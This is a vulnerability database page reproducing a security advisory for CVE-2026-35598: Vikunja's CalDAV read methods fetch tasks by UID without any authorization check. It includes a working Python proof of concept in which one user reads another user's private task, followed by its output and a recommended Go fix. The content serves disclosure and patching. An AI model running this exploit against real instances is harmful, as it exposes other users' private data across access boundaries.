GHSA-48CH-P4GQ-X46X

Vulnerability from github – Published: 2026-04-10 15:34 – Updated: 2026-04-10 19:36
VLAI?
Summary
Vikunja Missing Authorization on CalDAV Task Read
Details

Summary

The CalDAV GetResource and GetResourcesByList methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task's project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance.

Details

GetTasksByUIDs at pkg/models/tasks.go:376-393 performs a global database query with no authorization check:

func GetTasksByUIDs(s *xorm.Session, uids []string, a web.Auth) (tasks []*Task, err error) {
    tasks = []*Task{}
    err = s.In("uid", uids).Find(&tasks)
    // ...
}

The web.Auth parameter is accepted but never used for permission filtering. This function is called by: - GetResource at pkg/routes/caldav/listStorageProvider.go:266 (CalDAV GET) - GetResourcesByList at pkg/routes/caldav/listStorageProvider.go:199 (CalDAV REPORT multiget)

All other CalDAV operations enforce authorization: CreateResource checks CanCreate(), UpdateResource checks CanUpdate(), DeleteResource checks CanDelete(). Only the read operations skip authorization.

The project ID in the CalDAV URL is ignored. A request to /dav/projects/{attacker_project}/{victim_task_uid}.ics returns the victim's task regardless of which project ID is in the path.

Proof of Concept

Tested on Vikunja v2.2.2.

import requests
from requests.auth import HTTPBasicAuth

TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"

def login(u, p):
    return requests.post(f"{API}/login", json={"username": u, "password": p}).json()["token"]

def h(token):
    return {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

alice_token = login("alice", "Alice1234!")
bob_token = login("bob", "Bob12345!")

# alice creates private project and task
proj = requests.put(f"{API}/projects", headers=h(alice_token),
                    json={"title": "Private"}).json()
task = requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h(alice_token),
                    json={"title": "Secret CEO salary 500k"}).json()

# task UID must be set (normally done by CalDAV sync; here via sqlite for PoC)
# sqlite3 vikunja.db "UPDATE tasks SET uid='test-uid-001' WHERE id={task['id']};"
TASK_UID = "test-uid-001"

# bob tries REST API
r = requests.get(f"{API}/tasks/{task['id']}", headers=h(bob_token))
print(f"REST API: {r.status_code}")  # 403

# bob gets CalDAV token
caldav_token = requests.put(f"{API}/user/settings/token/caldav",
    headers=h(bob_token)).json()["token"]

# bob reads alice's task via CalDAV (project ID in URL doesn't matter)
r = requests.get(f"{TARGET}/dav/projects/{proj['id']}/{TASK_UID}.ics",
                 auth=HTTPBasicAuth("bob", caldav_token))
print(f"CalDAV: {r.status_code}")  # 200
print(r.text)  # contains SUMMARY:Secret CEO salary 500k

Output:

REST API: 403
CalDAV: 200
BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VTODO
UID:test-uid-001
SUMMARY:Secret CEO salary 500k
DUE:20260401T000000Z
END:VTODO
END:VCALENDAR

The REST API correctly returns 403, but CalDAV leaks the full task. The project ID in the CalDAV URL is ignored - bob can also use his own project ID and still get alice's task.

Impact

An authenticated CalDAV user who obtains a task UID (from shared calendar URLs, client sync logs, or enumeration) can read the full task details from any project in the instance, regardless of their access rights. This includes titles, descriptions, due dates, priority, labels, and reminders. In multi-tenant deployments, this exposes data across organizational boundaries.

Task UIDs are UUIDv4 and not trivially enumerable, but they are exposed in CalDAV resource paths, client synchronization logs, and shared calendar contexts.

Recommended Fix

Add a CanRead permission check on each returned task's project in both GetResource and GetResourcesByList:

tasks, err := models.GetTasksByUIDs(s, []string{vcls.task.UID}, vcls.user)
// ...
for _, t := range tasks {
    project := &models.Project{ID: t.ProjectID}
    can, _, err := project.CanRead(s, vcls.user)
    if err != nil || !can {
        return nil, false, errs.ForbiddenError
    }
}

Found and reported by aisafe.io

Severity ?
4.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.2.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35598"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T15:34:23Z",
    "nvd_published_at": "2026-04-10T17:17:03Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe CalDAV `GetResource` and `GetResourcesByList` methods fetch tasks by UID from the database without verifying that the authenticated user has access to the task\u0027s project. Any authenticated CalDAV user who knows (or guesses) a task UID can read the full task data from any project on the instance.\n\n## Details\n\n`GetTasksByUIDs` at `pkg/models/tasks.go:376-393` performs a global database query with no authorization check:\n\n```go\nfunc GetTasksByUIDs(s *xorm.Session, uids []string, a web.Auth) (tasks []*Task, err error) {\n    tasks = []*Task{}\n    err = s.In(\"uid\", uids).Find(\u0026tasks)\n    // ...\n}\n```\n\nThe `web.Auth` parameter is accepted but never used for permission filtering. This function is called by:\n- `GetResource` at `pkg/routes/caldav/listStorageProvider.go:266` (CalDAV GET)\n- `GetResourcesByList` at `pkg/routes/caldav/listStorageProvider.go:199` (CalDAV REPORT multiget)\n\nAll other CalDAV operations enforce authorization: `CreateResource` checks `CanCreate()`, `UpdateResource` checks `CanUpdate()`, `DeleteResource` checks `CanDelete()`. Only the read operations skip authorization.\n\nThe project ID in the CalDAV URL is ignored. A request to `/dav/projects/{attacker_project}/{victim_task_uid}.ics` returns the victim\u0027s task regardless of which project ID is in the path.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2.\n\n```python\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\nTARGET = \"http://localhost:3456\"\nAPI = f\"{TARGET}/api/v1\"\n\ndef login(u, p):\n    return requests.post(f\"{API}/login\", json={\"username\": u, \"password\": p}).json()[\"token\"]\n\ndef h(token):\n    return {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n\nalice_token = login(\"alice\", \"Alice1234!\")\nbob_token = login(\"bob\", \"Bob12345!\")\n\n# alice creates private project and task\nproj = requests.put(f\"{API}/projects\", headers=h(alice_token),\n                    json={\"title\": \"Private\"}).json()\ntask = requests.put(f\"{API}/projects/{proj[\u0027id\u0027]}/tasks\", headers=h(alice_token),\n                    json={\"title\": \"Secret CEO salary 500k\"}).json()\n\n# task UID must be set (normally done by CalDAV sync; here via sqlite for PoC)\n# sqlite3 vikunja.db \"UPDATE tasks SET uid=\u0027test-uid-001\u0027 WHERE id={task[\u0027id\u0027]};\"\nTASK_UID = \"test-uid-001\"\n\n# bob tries REST API\nr = requests.get(f\"{API}/tasks/{task[\u0027id\u0027]}\", headers=h(bob_token))\nprint(f\"REST API: {r.status_code}\")  # 403\n\n# bob gets CalDAV token\ncaldav_token = requests.put(f\"{API}/user/settings/token/caldav\",\n    headers=h(bob_token)).json()[\"token\"]\n\n# bob reads alice\u0027s task via CalDAV (project ID in URL doesn\u0027t matter)\nr = requests.get(f\"{TARGET}/dav/projects/{proj[\u0027id\u0027]}/{TASK_UID}.ics\",\n                 auth=HTTPBasicAuth(\"bob\", caldav_token))\nprint(f\"CalDAV: {r.status_code}\")  # 200\nprint(r.text)  # contains SUMMARY:Secret CEO salary 500k\n```\n\nOutput:\n```\nREST API: 403\nCalDAV: 200\nBEGIN:VCALENDAR\nVERSION:2.0\nBEGIN:VTODO\nUID:test-uid-001\nSUMMARY:Secret CEO salary 500k\nDUE:20260401T000000Z\nEND:VTODO\nEND:VCALENDAR\n```\n\nThe REST API correctly returns 403, but CalDAV leaks the full task. The project ID in the CalDAV URL is ignored - bob can also use his own project ID and still get alice\u0027s task.\n\n## Impact\n\nAn authenticated CalDAV user who obtains a task UID (from shared calendar URLs, client sync logs, or enumeration) can read the full task details from any project in the instance, regardless of their access rights. This includes titles, descriptions, due dates, priority, labels, and reminders. In multi-tenant deployments, this exposes data across organizational boundaries.\n\nTask UIDs are UUIDv4 and not trivially enumerable, but they are exposed in CalDAV resource paths, client synchronization logs, and shared calendar contexts.\n\n## Recommended Fix\n\nAdd a `CanRead` permission check on each returned task\u0027s project in both `GetResource` and `GetResourcesByList`:\n\n```go\ntasks, err := models.GetTasksByUIDs(s, []string{vcls.task.UID}, vcls.user)\n// ...\nfor _, t := range tasks {\n    project := \u0026models.Project{ID: t.ProjectID}\n    can, _, err := project.CanRead(s, vcls.user)\n    if err != nil || !can {\n        return nil, false, errs.ForbiddenError\n    }\n}\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-48ch-p4gq-x46x",
  "modified": "2026-04-10T19:36:26Z",
  "published": "2026-04-10T15:34:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-48ch-p4gq-x46x"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35598"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/pull/2579"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/879462d717351fe5d276ddec5246bdec31b41661"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vikunja Missing Authorization on CalDAV Task Read"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.